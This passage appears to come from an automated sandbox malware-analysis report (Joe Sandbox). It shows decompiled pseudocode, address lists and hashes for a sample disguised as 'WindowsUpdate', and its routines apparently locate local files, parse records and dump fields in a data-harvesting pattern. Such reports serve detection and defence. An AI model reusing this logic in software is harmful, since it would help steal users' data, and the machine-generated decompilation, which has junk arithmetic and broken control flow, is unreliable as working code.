						 *0x4700c0(_t59, _t46, _t58, 0);
						E00328F6C(_t59);
						_t29 = E002EB607(_t58);
						_t46 = _t29;
						_t65 = _t63 + 8;
						if(_t29 != 0) {
							_t59 = E00322987(_t48, _t46);
							E00328F6C(_t46);
							_t65 = _t65 + 8;
						} else {
							_t59 = 0;
						}
						E00328F6C(_t58);
						goto L12;
					}
				} else {
					_t10 =  *0x4700c4() + 3; // 0x3
					_t46 = _t10;
					_t53 = _t46 + _t46;
					_t58 = E00327BCE(_t46, _t57, _t46 + _t46);
					_t63 = _t62 + 4;
					if(_t58 != 0) {
						 *0x4700c4(_t59, _t46, _t58, 0);
						E00328F6C(_t59);
						_t59 = E00322987(_t53, _t58);
						E00328F6C(_t58);
						L12:
						if(_t59 == 0) {
							goto L5;
						} else {
							E002D71A7( *((intOrPtr*)(_a4 + 8)), _v160, 0x470310, _t59);
							E00328F6C(_t59);
							return E003272F2(0, _t46, _v8 ^ _t60, _t56, _t58, _t59);
						}
					} else {
						L4:
						E00328F6C(_t59);
						L5:
						return E003272F2(7, _t46, _v8 ^ _t60, _t56, _t58, _t59);
					}
				}
			}






















                                                                                                                    0x002d3d37
                                                                                                                    0x002d3d47
                                                                                                                    0x002d3d54
                                                                                                                    0x002d3d5a
                                                                                                                    0x002d3d5f
                                                                                                                    0x002d3d65
                                                                                                                    0x002d3d68
                                                                                                                    0x002d3d6c
                                                                                                                    0x002d3d75
                                                                                                                    0x002d3d7f
                                                                                                                    0x002d3d91
                                                                                                                    0x002d3d92
                                                                                                                    0x002d3d92
                                                                                                                    0x002d3d98
                                                                                                                    0x002d3d9a
                                                                                                                    0x002d3d9c
                                                                                                                    0x002d3d9e
                                                                                                                    0x002d3da2
                                                                                                                    0x002d3e08
                                                                                                                    0x002d3e08
                                                                                                                    0x002d3e11
                                                                                                                    0x002d3e13
                                                                                                                    0x002d3e18
                                                                                                                    0x00000000
                                                                                                                    0x002d3e1a
                                                                                                                    0x002d3e1f
                                                                                                                    0x002d3e26
                                                                                                                    0x002d3e2c
                                                                                                                    0x002d3e31
                                                                                                                    0x002d3e33
                                                                                                                    0x002d3e38
                                                                                                                    0x002d3e45
                                                                                                                    0x002d3e47
                                                                                                                    0x002d3e4c
                                                                                                                    0x002d3e3a
                                                                                                                    0x002d3e3a
                                                                                                                    0x002d3e3a
                                                                                                                    0x002d3e50
                                                                                                                    0x00000000
                                                                                                                    0x002d3e55
                                                                                                                    0x002d3da4
                                                                                                                    0x002d3daa
                                                                                                                    0x002d3daa
                                                                                                                    0x002d3dad
                                                                                                                    0x002d3db6
                                                                                                                    0x002d3db8
                                                                                                                    0x002d3dbd
                                                                                                                    0x002d3de3
                                                                                                                    0x002d3dea
                                                                                                                    0x002d3df6
                                                                                                                    0x002d3df8
                                                                                                                    0x002d3e58
                                                                                                                    0x002d3e5a
                                                                                                                    0x00000000
                                                                                                                    0x002d3e60
                                                                                                                    0x002d3e72
                                                                                                                    0x002d3e78
                                                                                                                    0x002d3e92
                                                                                                                    0x002d3e92
                                                                                                                    0x002d3dbf
                                                                                                                    0x002d3dbf
                                                                                                                    0x002d3dc0
                                                                                                                    0x002d3dca
                                                                                                                    0x002d3ddd
                                                                                                                    0x002d3ddd
                                                                                                                    0x002d3dbd

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3756984125-0
                                                                                                                    • Opcode ID: ad8f61c70eb99b68e000178201a2b036042c6bc6eddace92ec67a90037131b91
                                                                                                                    • Instruction ID: a6bb30dde37cc8cb58413981950dc64f1baec6a04fb971fdd061c0204274275b
                                                                                                                    • Opcode Fuzzy Hash: ad8f61c70eb99b68e000178201a2b036042c6bc6eddace92ec67a90037131b91
                                                                                                                    • Instruction Fuzzy Hash: 80312571A12124ABD721AF74FC42FAF73A8AF45710F140179F8099B242DF359E198BA6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CD1C7 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 339COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E002CD1C7(void* __ebx, void* __edx) {
				signed int _v8;
				void* _v12;
				char _v36;
				char _v153;
				char _v154;
				short _v156;
				char _v164;
				void _v216;
				char _v736;
				char _v855;
				char _v856;
				char _v864;
				char _v1364;
				char _v2364;
				char _v2884;
				char _v3908;
				char _v4932;
				signed int _v4936;
				char _v4940;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t91;
				void* _t99;
				signed int _t103;
				signed int _t110;
				signed int _t118;
				char* _t119;
				signed int _t120;
				void* _t123;
				void* _t132;
				signed int _t134;
				intOrPtr* _t135;
				signed int _t137;
				signed int _t140;
				signed int _t159;
				void* _t171;
				intOrPtr* _t178;
				void* _t179;
				intOrPtr* _t181;
				intOrPtr* _t184;
				signed int _t186;
				intOrPtr* _t187;
				intOrPtr* _t190;
				void* _t191;
				void* _t194;
				void* _t199;
				intOrPtr* _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				signed int _t206;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t219;
				void* _t220;
				void* _t221;

				_t194 = __edx;
				_t173 = __ebx;
				E00327307(0x1348);
				_v8 =  *0x481f80 ^ _t206;
				asm("movq xmm0, [0x470728]");
				_v856 =  *0x470730 & 0x000000ff;
				asm("movq [ebp-0x35c], xmm0");
				E00327C87( &_v855, 0, 0x77);
				asm("movq xmm0, [0x470734]");
				_v156 =  *0x47073c & 0x0000ffff;
				_v154 =  *0x47073e & 0x000000ff;
				asm("movq [ebp-0xa0], xmm0");
				E00327C87( &_v153, 0, 0x75);
				asm("movq xmm0, [0x470774]");
				_t203 = 0x470740;
				_t91 = memcpy( &_v216, 0x470740, 0xc << 2);
				_t209 = _t207 + 0x24;
				_v12 = _t91;
				_push( &_v736);
				_push(0);
				asm("movq [ebp-0x20], xmm0");
				asm("movq xmm0, [0x47077c]");
				_push(0);
				asm("movq [ebp-0x18], xmm0");
				asm("movq xmm0, [0x470784]");
				_push(0x1c);
				_push(0);
				_v4940 = 0;
				_v4936 = 0;
				asm("movsw");
				asm("movq [ebp-0x10], xmm0");
				if( *0x470200() < 0) {
					L38:
					_t78 =  &_v8; // 0x2ceb44
					_pop(_t199);
					__eflags =  *_t78 ^ _t206;
					_pop(_t204);
					return E003272F2(_t93, _t173,  *_t78 ^ _t206, _t194, _t199, _t204);
				} else {
					E00327B4E( &_v736, 0x208,  &_v36);
					_t99 = E002CBD87( &_v736);
					_t210 = _t209 + 0x10;
					if(_t99 != 0) {
						E00327AF9( &_v2884, 0x208,  &_v736);
						_t178 =  &_v736;
						_t211 = _t210 + 0xc;
						_t194 = _t178 + 1;
						do {
							_t103 =  *_t178;
							_t178 = _t178 + 1;
							__eflags = _t103;
						} while (_t103 != 0);
						_t179 = _t178 - _t194;
						__eflags =  *((char*)(_t206 + _t179 - 0x2dd)) - 0x5c;
						if( *((char*)(_t206 + _t179 - 0x2dd)) != 0x5c) {
							E00327B4E( &_v736, 0x208, 0x470790);
							E00327B4E( &_v736, 0x208,  &_v164);
							_t212 = _t211 + 0x18;
						} else {
							E00327B4E( &_v736, 0x208,  &_v164);
							_t212 = _t211 + 0xc;
						}
						_t110 = E002CBDA7( &_v736);
						_t213 = _t212 + 4;
						__eflags = _t110;
						if(_t110 == 0) {
							E00327AF9( &_v736, 0x208,  &_v2884);
							E00327AF9( &_v164, 0x80,  &_v864);
							_t190 =  &_v736;
							_t221 = _t213 + 0x18;
							_t194 = _t190 + 1;
							do {
								_t159 =  *_t190;
								_t190 = _t190 + 1;
								__eflags = _t159;
							} while (_t159 != 0);
							_t191 = _t190 - _t194;
							__eflags =  *((char*)(_t206 + _t191 - 0x2dd)) - 0x5c;
							if( *((char*)(_t206 + _t191 - 0x2dd)) != 0x5c) {
								E00327B4E( &_v736, 0x208, 0x470790);
								E00327B4E( &_v736, 0x208,  &_v164);
								_t213 = _t221 + 0x18;
							} else {
								E00327B4E( &_v736, 0x208,  &_v164);
								_t213 = _t221 + 0xc;
							}
						}
						 *0x4700e8(0x3e8,  &_v2364);
						E00327B4E( &_v2364, 0x3e8,  &_v164);
						_t214 = _t213 + 0xc;
						_t118 =  *0x4700a4( &_v736,  &_v2364, 0);
						__eflags = _t118;
						if(_t118 != 0) {
							_t119 =  &_v2364;
						} else {
							 *0x470124();
							_t119 =  &_v736;
						}
						_push(0);
						_push(1);
						_t93 = E002D7A57(_t119,  &_v4940);
						_t215 = _t214 + 0x10;
						__eflags = _t93;
						if(_t93 == 0) {
							_t181 =  &_v216;
							_t194 = _t181 + 1;
							do {
								_t120 =  *_t181;
								_t181 = _t181 + 1;
								__eflags = _t120;
							} while (_t120 != 0);
							_t93 = E002D7D07(_v4940,  &_v216, _t181 - _t194,  &_v4936, 0);
							_t216 = _t215 + 0x14;
							__eflags = _t93;
							if(_t93 == 0) {
								_t93 = _v4936;
								__eflags = _t93;
								if(_t93 != 0) {
									_t123 = E002D8C87(_t93);
									_t217 = _t216 + 4;
									__eflags = _t123 - 0x65;
									if(_t123 != 0x65) {
										while(1) {
											__eflags = _t123 - 0x64;
											if(_t123 != 0x64) {
												goto L37;
											}
											E00327AF9( &_v3908, 0x400, E002D91D7(_v4936, 1));
											_t200 = E002D91D7(_v4936, 3);
											_t203 = E002D8DE7(_v4936, 5);
											_t132 = E002D8EF7(_v4936, 5);
											_push(0x400);
											E002CBEF7(_t131, _t132,  &_v4932);
											_t184 =  &_v3908;
											_t219 = _t217 + 0x3c;
											_t194 = _t184 + 1;
											do {
												_t134 =  *_t184;
												_t184 = _t184 + 1;
												__eflags = _t134;
											} while (_t134 != 0);
											__eflags = _t184 - _t194 - 1;
											if(_t184 - _t194 >= 1) {
												_t135 = _t200;
												_t64 = _t135 + 1; // 0x1
												_t194 = _t64;
												do {
													_t186 =  *_t135;
													_t135 = _t135 + 1;
													__eflags = _t186;
												} while (_t186 != 0);
												__eflags = _t135 - _t194 - 1;
												if(_t135 - _t194 >= 1) {
													_t187 =  &_v4932;
													_t194 = _t187 + 1;
													do {
														_t137 =  *_t187;
														_t187 = _t187 + 1;
														__eflags = _t137;
													} while (_t137 != 0);
													__eflags = _t187 - _t194 - 1;
													if(_t187 - _t194 >= 1) {
														E00327AF9( &_v1364, 0x1f4, 0x470a30);
														_t140 =  *0x4833ac;
														_t220 = _t219 + 0xc;
														__eflags = _t140;
														if(__eflags != 0) {
															_push( &_v1364);
															_push(0x470aac);
															_push(_t140);
															E003292CF(_t173, _t200, _t203, __eflags);
															_push( &_v3908);
															_push(0x470abc);
															_push( *0x4833ac);
															E003292CF(_t173, _t200, _t203, __eflags);
															E003293E1( *0x4833ac, 0x470acc, _t200);
															E003293E1( *0x4833ac, 0x470adc,  &_v4932);
															_push( *0x4833ac);
															_push(0x470af0);
															E003293FA(_t173, _t200, _t203, __eflags);
															_t219 = _t220 + 0x38;
														} else {
															_push( &_v3908);
															_push( &_v4932);
															_push(_t200);
															_push( &_v1364);
															_push(0x470a8c);
															E00329C53(_t173, _t200, _t203, __eflags);
															_t219 = _t220 + 0x14;
														}
													}
												}
											}
											_t123 = E002D8C87(_v4936);
											_t217 = _t219 + 4;
											__eflags = _t123 - 0x65;
											if(_t123 != 0x65) {
												continue;
											}
											goto L37;
										}
									}
									L37:
									E002D9387(_v4936);
									E002D4A77(_t173, _t203, _v4940);
									_t93 =  *0x4700e4( &_v2364);
								}
							}
						}
						goto L38;
					} else {
						_t171 =  *0x470124();
						_pop(_t201);
						_pop(_t205);
						_t16 =  &_v8; // 0x2ceb44
						return E003272F2(_t171, __ebx,  *_t16 ^ _t206, _t194, _t201, _t205);
					}
				}
			}




































































                                                                                                                    0x002cd1c7
                                                                                                                    0x002cd1c7
                                                                                                                    0x002cd1cf
                                                                                                                    0x002cd1db
                                                                                                                    0x002cd1e5
                                                                                                                    0x002cd1f1
                                                                                                                    0x002cd200
                                                                                                                    0x002cd208
                                                                                                                    0x002cd214
                                                                                                                    0x002cd21c
                                                                                                                    0x002cd22c
                                                                                                                    0x002cd23b
                                                                                                                    0x002cd243
                                                                                                                    0x002cd24f
                                                                                                                    0x002cd25f
                                                                                                                    0x002cd26a
                                                                                                                    0x002cd26a
                                                                                                                    0x002cd26c
                                                                                                                    0x002cd276
                                                                                                                    0x002cd277
                                                                                                                    0x002cd279
                                                                                                                    0x002cd27e
                                                                                                                    0x002cd286
                                                                                                                    0x002cd288
                                                                                                                    0x002cd28d
                                                                                                                    0x002cd295
                                                                                                                    0x002cd297
                                                                                                                    0x002cd299
                                                                                                                    0x002cd2a3
                                                                                                                    0x002cd2ad
                                                                                                                    0x002cd2af
                                                                                                                    0x002cd2bc
                                                                                                                    0x002cd6b1
                                                                                                                    0x002cd6b1
                                                                                                                    0x002cd6b4
                                                                                                                    0x002cd6b5
                                                                                                                    0x002cd6b7
                                                                                                                    0x002cd6c0
                                                                                                                    0x002cd2c2
                                                                                                                    0x002cd2d2
                                                                                                                    0x002cd2de
                                                                                                                    0x002cd2e3
                                                                                                                    0x002cd2e8
                                                                                                                    0x002cd313
                                                                                                                    0x002cd318
                                                                                                                    0x002cd31e
                                                                                                                    0x002cd321
                                                                                                                    0x002cd327
                                                                                                                    0x002cd327
                                                                                                                    0x002cd329
                                                                                                                    0x002cd32a
                                                                                                                    0x002cd32a
                                                                                                                    0x002cd32e
                                                                                                                    0x002cd330
                                                                                                                    0x002cd338
                                                                                                                    0x002cd368
                                                                                                                    0x002cd380
                                                                                                                    0x002cd385
                                                                                                                    0x002cd33a
                                                                                                                    0x002cd34d
                                                                                                                    0x002cd352
                                                                                                                    0x002cd352
                                                                                                                    0x002cd38f
                                                                                                                    0x002cd394
                                                                                                                    0x002cd397
                                                                                                                    0x002cd399
                                                                                                                    0x002cd3b2
                                                                                                                    0x002cd3ca
                                                                                                                    0x002cd3cf
                                                                                                                    0x002cd3d5
                                                                                                                    0x002cd3d8
                                                                                                                    0x002cd3db
                                                                                                                    0x002cd3db
                                                                                                                    0x002cd3dd
                                                                                                                    0x002cd3de
                                                                                                                    0x002cd3de
                                                                                                                    0x002cd3e2
                                                                                                                    0x002cd3e4
                                                                                                                    0x002cd3ec
                                                                                                                    0x002cd41c
                                                                                                                    0x002cd434
                                                                                                                    0x002cd439
                                                                                                                    0x002cd3ee
                                                                                                                    0x002cd401
                                                                                                                    0x002cd406
                                                                                                                    0x002cd406
                                                                                                                    0x002cd3ec
                                                                                                                    0x002cd448
                                                                                                                    0x002cd461
                                                                                                                    0x002cd466
                                                                                                                    0x002cd479
                                                                                                                    0x002cd47f
                                                                                                                    0x002cd481
                                                                                                                    0x002cd491
                                                                                                                    0x002cd483
                                                                                                                    0x002cd483
                                                                                                                    0x002cd489
                                                                                                                    0x002cd489
                                                                                                                    0x002cd497
                                                                                                                    0x002cd499
                                                                                                                    0x002cd4a3
                                                                                                                    0x002cd4a8
                                                                                                                    0x002cd4ab
                                                                                                                    0x002cd4ad
                                                                                                                    0x002cd4b3
                                                                                                                    0x002cd4b9
                                                                                                                    0x002cd4bc
                                                                                                                    0x002cd4bc
                                                                                                                    0x002cd4be
                                                                                                                    0x002cd4bf
                                                                                                                    0x002cd4bf
                                                                                                                    0x002cd4dc
                                                                                                                    0x002cd4e1
                                                                                                                    0x002cd4e4
                                                                                                                    0x002cd4e6
                                                                                                                    0x002cd4ec
                                                                                                                    0x002cd4f2
                                                                                                                    0x002cd4f4
                                                                                                                    0x002cd4fb
                                                                                                                    0x002cd500
                                                                                                                    0x002cd503
                                                                                                                    0x002cd506
                                                                                                                    0x002cd50c
                                                                                                                    0x002cd50c
                                                                                                                    0x002cd50f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002cd52f
                                                                                                                    0x002cd549
                                                                                                                    0x002cd558
                                                                                                                    0x002cd55a
                                                                                                                    0x002cd55f
                                                                                                                    0x002cd56d
                                                                                                                    0x002cd572
                                                                                                                    0x002cd578
                                                                                                                    0x002cd57b
                                                                                                                    0x002cd57e
                                                                                                                    0x002cd57e
                                                                                                                    0x002cd580
                                                                                                                    0x002cd581
                                                                                                                    0x002cd581
                                                                                                                    0x002cd587
                                                                                                                    0x002cd58a
                                                                                                                    0x002cd590
                                                                                                                    0x002cd592
                                                                                                                    0x002cd592
                                                                                                                    0x002cd597
                                                                                                                    0x002cd597
                                                                                                                    0x002cd599
                                                                                                                    0x002cd59a
                                                                                                                    0x002cd59a
                                                                                                                    0x002cd5a0
                                                                                                                    0x002cd5a3
                                                                                                                    0x002cd5a9
                                                                                                                    0x002cd5af
                                                                                                                    0x002cd5b7
                                                                                                                    0x002cd5b7
                                                                                                                    0x002cd5b9
                                                                                                                    0x002cd5ba
                                                                                                                    0x002cd5ba
                                                                                                                    0x002cd5c0
                                                                                                                    0x002cd5c3
                                                                                                                    0x002cd5da
                                                                                                                    0x002cd5df
                                                                                                                    0x002cd5e4
                                                                                                                    0x002cd5e7
                                                                                                                    0x002cd5e9
                                                                                                                    0x002cd616
                                                                                                                    0x002cd617
                                                                                                                    0x002cd61c
                                                                                                                    0x002cd61d
                                                                                                                    0x002cd628
                                                                                                                    0x002cd629
                                                                                                                    0x002cd62e
                                                                                                                    0x002cd634
                                                                                                                    0x002cd645
                                                                                                                    0x002cd65c
                                                                                                                    0x002cd661
                                                                                                                    0x002cd667
                                                                                                                    0x002cd66c
                                                                                                                    0x002cd671
                                                                                                                    0x002cd5eb
                                                                                                                    0x002cd5f1
                                                                                                                    0x002cd5f8
                                                                                                                    0x002cd5f9
                                                                                                                    0x002cd600
                                                                                                                    0x002cd601
                                                                                                                    0x002cd606
                                                                                                                    0x002cd60b
                                                                                                                    0x002cd60b
                                                                                                                    0x002cd5e9
                                                                                                                    0x002cd5c3
                                                                                                                    0x002cd5a3
                                                                                                                    0x002cd67a
                                                                                                                    0x002cd67f
                                                                                                                    0x002cd682
                                                                                                                    0x002cd685
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002cd685
                                                                                                                    0x002cd50c
                                                                                                                    0x002cd68b
                                                                                                                    0x002cd691
                                                                                                                    0x002cd69c
                                                                                                                    0x002cd6ab
                                                                                                                    0x002cd6ab
                                                                                                                    0x002cd4f4
                                                                                                                    0x002cd4e6
                                                                                                                    0x00000000
                                                                                                                    0x002cd2ea
                                                                                                                    0x002cd2ea
                                                                                                                    0x002cd2f0
                                                                                                                    0x002cd2f1
                                                                                                                    0x002cd2f2
                                                                                                                    0x002cd2ff
                                                                                                                    0x002cd2ff
                                                                                                                    0x002cd2e8

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: D,$\
                                                                                                                    • API String ID: 2102423945-366439740
                                                                                                                    • Opcode ID: 89c77ba188483e2b994595e2b464948e8f740521c482530cf10d2cf753cb2a14
                                                                                                                    • Instruction ID: 12f3f00217f354097bef205f34fa34f9b54a65a09849f307bf3f8ffe103012a5
                                                                                                                    • Opcode Fuzzy Hash: 89c77ba188483e2b994595e2b464948e8f740521c482530cf10d2cf753cb2a14
                                                                                                                    • Instruction Fuzzy Hash: 51C1C471910269AEDF25EBA0DC55FEE737CAF15300F1042FAF609A6142EA71AB94CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CD867 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: swprintf$_memset
                                                                                                                    • String ID: D$N,
                                                                                                                    • API String ID: 1292703666-1971026761
                                                                                                                    • Opcode ID: 5f3aa764ff59d5899a7b3aa04a70e0d1a5d7d246ccbea1a6b2de96ceda57c230
                                                                                                                    • Instruction ID: c8048b1f1e75a1c2ad9180fc7d3d7005d2c90708e2484368090dacfc2bd0796f
                                                                                                                    • Opcode Fuzzy Hash: 5f3aa764ff59d5899a7b3aa04a70e0d1a5d7d246ccbea1a6b2de96ceda57c230
                                                                                                                    • Instruction Fuzzy Hash: E25161B19112189AEB11EBA0DC45FDE73BCAF08700F4002A5F64CE6191EB71AB948F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CE577 Relevance: 12.2, APIs: 8, Instructions: 245COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 71%
                                                                                                                    			E002CE577(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v1032;
				char _v1532;
				char _v6532;
				char _v11532;
				char _v21536;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				char _t69;
				void* _t76;
				intOrPtr* _t78;
				signed int _t79;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t87;
				void* _t101;
				intOrPtr* _t115;
				intOrPtr _t125;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr* _t136;
				void* _t139;
				void* _t141;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t146;
				void* _t147;
				signed int _t149;
				signed int _t152;
				void* _t153;
				void* _t155;
				void* _t158;
				void* _t160;

				_t145 = __esi;
				_t144 = __edi;
				_t127 = __ebx;
				_t149 = _t152;
				E00327307(0x541c);
				_v8 =  *0x481f80 ^ _t149;
				_v21536 = 0;
				_t60 = E0032928A( &_v21536, _a4, 0x470890);
				_t153 = _t152 + 0xc;
				if(_t60 != 0) {
					L32:
					__eflags = 0;
					return E003272F2(0, _t127, _v8 ^ _t149, _t141, _t144, _t145);
				} else {
					_t63 = _v21536;
					_t162 = _t63;
					if(_t63 == 0) {
						goto L32;
					} else {
						_push(__esi);
						_push(_t63);
						_push(0x1388);
						_push( &_v11532);
						_t146 = 0;
						_t65 = E00329087(__ebx, __edi, 0, _t162);
						_t155 = _t153 + 0xc;
						if(_t65 == 0) {
							L31:
							_push(_v21536);
							E00329010(_t127, _t144, _t146, _t177);
							_pop(_t147);
							return E003272F2(1, _t127, _v8 ^ _t149, _t141, _t144, _t147);
						} else {
							_push(__edi);
							do {
								_t132 =  &_v11532;
								_t141 = _t132 + 1;
								do {
									_t69 =  *_t132;
									_t132 = _t132 + 1;
								} while (_t69 != 0);
								_t133 = _t132 - _t141;
								if(_t133 == 0) {
									L9:
									E00327AF9( &_v6532, 0x1388,  &_v11532);
									E00328317( &_v6532, 0x1388);
									_t76 = E00328487( &_v6532, 0x470894);
									_t158 = _t155 + 0x1c;
									if(_t76 == 0) {
										_t78 = E00328487( &_v6532, 0x47089c);
										_t158 = _t158 + 8;
										__eflags = _t78;
										if(_t78 != 0) {
											_v1032 = 0;
											_v520 = 0;
											_v264 = 0;
											_t146 = 1;
										}
										_t40 = _t146 - 1; // 0x0
										_t79 = _t40;
										__eflags = _t79 - 6;
										if(__eflags <= 0) {
											goto ( *((intOrPtr*)(0x40432c + _t79 * 4)));
										}
									} else {
										_t134 =  &_v1032;
										_t141 = _t134 + 1;
										do {
											_t82 =  *_t134;
											_t134 = _t134 + 1;
										} while (_t82 != 0);
										_t135 = _t134 - _t141;
										if(_t135 == 0) {
											L24:
											_v1032 = 0;
											_v520 = 0;
											_v264 = 0;
										} else {
											_t142 =  &_v264;
											_t144 = _t142 + 1;
											do {
												_t83 =  *_t142;
												_t142 = _t142 + 1;
											} while (_t83 != 0);
											_t141 = _t142 - _t144;
											if(_t141 == 0 || _t135 < 1 || _t141 < 1) {
												goto L24;
											} else {
												_t136 =  &_v520;
												_t141 = _t136 + 1;
												do {
													_t84 =  *_t136;
													_t136 = _t136 + 1;
												} while (_t84 != 0);
												if(_t136 - _t141 < 1) {
													goto L24;
												} else {
													E00327AF9( &_v1532, 0x1f4, 0x470a20);
													_t87 =  *0x4833ac;
													_t160 = _t158 + 0xc;
													_t176 = _t87;
													if(_t87 != 0) {
														_push( &_v1532);
														_push(0x470aac);
														_push(_t87);
														E003292CF(_t127, _t144, _t146, __eflags);
														_push( &_v1032);
														_push(0x470abc);
														_push( *0x4833ac);
														E003292CF(_t127, _t144, _t146, __eflags);
														E003293E1( *0x4833ac, 0x470acc,  &_v264);
														E003293E1( *0x4833ac, 0x470adc,  &_v520);
														_push( *0x4833ac);
														_push(0x470af0);
														E003293FA(_t127, _t144, _t146, __eflags);
														_t158 = _t160 + 0x38;
														goto L24;
													} else {
														_push( &_v1032);
														_push( &_v520);
														_push( &_v264);
														_push( &_v1532);
														_push(0x470a8c);
														E00329C53(_t127, _t144, _t146, _t176);
														_t158 = _t160 + 0x14;
														_v1032 = 0;
														_v520 = 0;
														_v264 = 0;
													}
												}
											}
										}
									}
									goto L29;
								} else {
									_t139 = _t133 - 1;
									if(_t139 >= 0x1388) {
										_t101 = E00327EEC();
										if(__eflags >= 0) {
											 *((intOrPtr*)(_t101 + 0x4c004041)) =  *((intOrPtr*)(_t101 + 0x4c004041)) + _t127;
											 *((intOrPtr*)(_t141 + 0x41)) =  *((intOrPtr*)(_t141 + 0x41)) + _t141;
											 *((intOrPtr*)(_t144 + 0x8004041)) =  *((intOrPtr*)(_t144 + 0x8004041)) + _t127;
											 *_t146 =  *_t146 + _t139 + 1;
											_t141 = _t141 + 2;
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_t125 = E002CB9C7(_t127, _t141, 0x483320);
											_t155 = _t155 + 4;
											 *0x4833a0 = _t125;
											_t126 = E002CBDC7(_t127, _t144, _t146);
											 *0x4833a8 = _t126;
											__eflags = _t126;
										}
										if(__eflags != 0) {
											E002CF1D7();
										}
										E002CCCF7(_t141, 5);
										E002CCCF7(_t141, 0xe);
										E002CCCF7(_t141, 0xd);
										E002CCCF7(_t141, 0x10);
										E002CCCF7(_t141, 0x11);
										E002CD127(__eflags, 7);
										E002CD127(__eflags, 0xf);
										__eflags =  *0x4833a0 - 7;
										if( *0x4833a0 >= 7) {
											E002CBF57(_t127, _t141, _t144, _t146);
											L002CDA77();
											E002CEB67();
										} else {
											L002CDF27();
										}
										E002CD1C7(_t127, _t141);
										E002CD6C7(_t127, _t141, _t144, _t146);
										E002CD867(_t127, _t141, _t144, _t146);
										_t115 =  *0x4843b0;
										__eflags = _t115;
										if(_t115 != 0) {
											return  *0x470114(_t115);
										}
										return _t115;
									} else {
										 *((char*)(_t149 + _t139 - 0x2d08)) = _t69;
										goto L9;
									}
								}
								goto L44;
								L29:
								_push(_v21536);
								_push(0x1388);
								_push( &_v11532);
								_t81 = E00329087(_t127, _t144, _t146, _t176);
								_t155 = _t158 + 0xc;
								_t177 = _t81;
							} while (_t81 != 0);
							_pop(_t144);
							goto L31;
						}
					}
				}
				L44:
			}













































                                                                                                                    0x002ce577
                                                                                                                    0x002ce577
                                                                                                                    0x002ce577
                                                                                                                    0x002ce578
                                                                                                                    0x002ce57f
                                                                                                                    0x002ce58b
                                                                                                                    0x002ce59e
                                                                                                                    0x002ce5a8
                                                                                                                    0x002ce5ad
                                                                                                                    0x002ce5b2
                                                                                                                    0x002cea8d
                                                                                                                    0x002cea92
                                                                                                                    0x002cea9c
                                                                                                                    0x002ce5b8
                                                                                                                    0x002ce5b8
                                                                                                                    0x002ce5be
                                                                                                                    0x002ce5c0
                                                                                                                    0x00000000
                                                                                                                    0x002ce5c6
                                                                                                                    0x002ce5c6
                                                                                                                    0x002ce5c7
                                                                                                                    0x002ce5ce
                                                                                                                    0x002ce5d3
                                                                                                                    0x002ce5d4
                                                                                                                    0x002ce5d6
                                                                                                                    0x002ce5db
                                                                                                                    0x002ce5e0
                                                                                                                    0x002cea6b
                                                                                                                    0x002cea6b
                                                                                                                    0x002cea71
                                                                                                                    0x002cea7e
                                                                                                                    0x002cea8c
                                                                                                                    0x002ce5e6
                                                                                                                    0x002ce5e6
                                                                                                                    0x002ce5e7
                                                                                                                    0x002ce5e7
                                                                                                                    0x002ce5ed
                                                                                                                    0x002ce5f7
                                                                                                                    0x002ce5f7
                                                                                                                    0x002ce5f9
